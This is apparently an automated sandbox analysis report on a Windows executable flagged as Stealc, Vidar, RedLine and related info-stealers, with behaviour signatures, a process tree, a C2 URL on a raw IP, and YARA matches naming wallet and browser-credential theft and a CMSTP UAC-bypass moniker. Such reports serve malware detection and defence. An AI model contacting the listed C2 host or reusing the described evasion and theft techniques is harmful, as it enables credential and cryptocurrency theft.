Edit tour

Windows Analysis Report
g77dRQ1Csm.exe

Overview

General Information

Sample name:	g77dRQ1Csm.exe renamed because original name is a hash value
Original sample name:	41de8e3e7412b6e97b60fdbfdd24b0ba.exe
Analysis ID:	1431471
MD5:	41de8e3e7412b6e97b60fdbfdd24b0ba
SHA1:	fa48e5a86b5f2b04b79f6c3459339a16c2db6aaa
SHA256:	480b540cb344d74306d03347658b2018a4b8504f4055ad15ba43456953d7b33c
Tags:	32exeStealctrojan
Infos:

Detection

Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected Mars stealer

Yara detected PureLog Stealer

Yara detected RedLine Stealer

Yara detected Stealc

Yara detected UAC Bypass using CMSTP

Yara detected Vidar stealer

Yara detected zgRAT

C2 URLs / IPs found in malware configuration

Checks if the current machine is a virtual machine (disk enumeration)

Connects to many ports of the same IP (likely port scanning)

Found direct / indirect Syscall (likely to bypass EDR)

Found evasive API chain (may stop execution after checking locale)

Found hidden mapped module (file has been removed from disk)

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries keyboard layouts

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

g77dRQ1Csm.exe (PID: 5288 cmdline: "C:\Users\user\Desktop\g77dRQ1Csm.exe" MD5: 41DE8E3E7412B6E97B60FDBFDD24B0BA)

u42w.0.exe (PID: 1720 cmdline: "C:\Users\user\AppData\Local\Temp\u42w.0.exe" MD5: A0E6719CEB3DC236283AB59B7F39B058)

cmd.exe (PID: 8040 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

FCBAECGIEB.exe (PID: 8128 cmdline: "C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe" MD5: 6C93FC68E2F01C20FB81AF24470B790C)

WerFault.exe (PID: 8136 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 2332 MD5: C31336C1EFC2CCB44B4326EA793040F2)

run.exe (PID: 2004 cmdline: "C:\Users\user\AppData\Local\Temp\u42w.2\run.exe" MD5: 9FB4770CED09AAE3B437C1C6EB6D7334)

cmd.exe (PID: 5424 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSBuild.exe (PID: 7888 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

u42w.3.exe (PID: 5180 cmdline: "C:\Users\user\AppData\Local\Temp\u42w.3.exe" MD5: 397926927BCA55BE4A77839B1C44DE6E)

SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe (PID: 7824 cmdline: "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1 MD5: 8E9C467EAC35B35DA1F586014F29C330)

WerFault.exe (PID: 7212 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 1180 MD5: C31336C1EFC2CCB44B4326EA793040F2)

run.exe (PID: 7872 cmdline: "C:\Users\user\AppData\Local\Temp\u42w.2\run.exe" MD5: 9FB4770CED09AAE3B437C1C6EB6D7334)

cmd.exe (PID: 7904 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSBuild.exe (PID: 7672 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: StealC

{"C2 url": "185.172.128.76/3cd2b41cbde8fc9c.php"}

Threatname: Vidar

{"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\cqecfsbe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\cqecfsbe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\cqecfsbe	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdg	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdg	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdg	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
C:\Users\user\AppData\Local\Temp\u42w.3.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Click to see the 2 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000000.1772107020.0000000000401000.00000020.00000001.01000000.0000000C.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000001.00000002.2090394875.0000000002F5C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000003.00000002.2055548397.0000000005E10000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.2055548397.0000000005E10000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000000.00000002.1898539579.0000000002F67000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0xd60:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000001.00000003.1714056198.0000000002F00000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000001.00000003.1714056198.0000000002F00000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000011.00000002.2204859505.0000000005A00000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.2204859505.0000000005A00000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000001.00000002.2089955902.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000001.00000002.2089955902.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000001.00000002.2089955902.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000000.00000003.1773870952.0000000005DF3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000019.00000002.2204440453.0000000001102000.00000002.00000001.01000000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000019.00000002.2204440453.0000000001102000.00000002.00000001.01000000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000E.00000002.2942860915.00000173F4640000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000001.00000002.2090299966.0000000002F47000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x10b0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000E.00000000.1978341064.00000173EE71B000.00000002.00000001.01000000.00000012.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: u42w.0.exe PID: 1720	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: u42w.0.exe PID: 1720	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: u42w.0.exe PID: 1720	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: run.exe PID: 2004	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 5424	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: cmd.exe PID: 5424	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 5424	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: run.exe PID: 7872	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 7904	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: cmd.exe PID: 7904	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 7904	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 7672	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 7672	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 38 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.3.u42w.0.exe.2f00000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.3.u42w.0.exe.2f00000.0.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
1.2.u42w.0.exe.2ed0e67.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.u42w.0.exe.2ed0e67.1.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
3.2.cmd.exe.5e100c8.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.cmd.exe.5e100c8.8.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
3.2.cmd.exe.5e100c8.8.raw.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f4640000.7.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.run.exe.3a2fd5b.7.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
2.2.run.exe.3a2fd5b.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0fe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d189:$s1: CoGetObject 0x1d0e2:$s2: Elevation:Administrator!new:
17.2.cmd.exe.5a000c8.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.cmd.exe.5a000c8.7.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
17.2.cmd.exe.5a000c8.7.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb684a:$s14: keybd_event 0xbd5b9:$v1_1: grabber@ 0xb741c:$v1_2: <BrowserProfile>k__ 0xb7e95:$v1_3: <SystemHardwares>k__ 0xb7f54:$v1_5: <ScannedWallets>k__ 0xb7fe4:$v1_6: <DicrFiles>k__ 0xb7fc0:$v1_7: <MessageClientFiles>k__ 0xb838a:$v1_8: <ScanBrowsers>k__BackingField 0xb83dc:$v1_8: <ScanWallets>k__BackingField 0xb83f9:$v1_8: <ScanScreen>k__BackingField 0xb8433:$v1_8: <ScanVPN>k__BackingField 0xa9c62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xa956e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
2.2.run.exe.3a2f15b.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
2.2.run.exe.3a2f15b.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcfe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd89:$s1: CoGetObject 0x1dce2:$s2: Elevation:Administrator!new:
1.2.u42w.0.exe.2ed0e67.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.u42w.0.exe.2ed0e67.1.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
1.2.u42w.0.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.u42w.0.exe.400000.0.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
1.3.u42w.0.exe.2f00000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.3.u42w.0.exe.2f00000.0.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
17.2.cmd.exe.5427976.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
17.2.cmd.exe.5427976.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x615ec:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x61677:$s1: CoGetObject 0x615d0:$s2: Elevation:Administrator!new:
15.2.run.exe.3e5286d.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
15.2.run.exe.3e5286d.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x615ec:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x61677:$s1: CoGetObject 0x615d0:$s2: Elevation:Administrator!new:
14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f4860000.13.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f4860000.13.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.cmd.exe.5472264.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
3.2.cmd.exe.5472264.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcfe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd89:$s1: CoGetObject 0x1dce2:$s2: Elevation:Administrator!new:
1.2.u42w.0.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.u42w.0.exe.400000.0.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
2.2.run.exe.39eb86d.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
2.2.run.exe.39eb86d.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x615ec:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x61677:$s1: CoGetObject 0x615d0:$s2: Elevation:Administrator!new:
3.2.cmd.exe.5472e64.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
3.2.cmd.exe.5472e64.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0fe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d189:$s1: CoGetObject 0x1d0e2:$s2: Elevation:Administrator!new:
14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f4640000.7.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
17.2.cmd.exe.5a000c8.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.cmd.exe.5a000c8.7.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
17.2.cmd.exe.5a000c8.7.raw.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
25.2.MSBuild.exe.1100000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
25.2.MSBuild.exe.1100000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
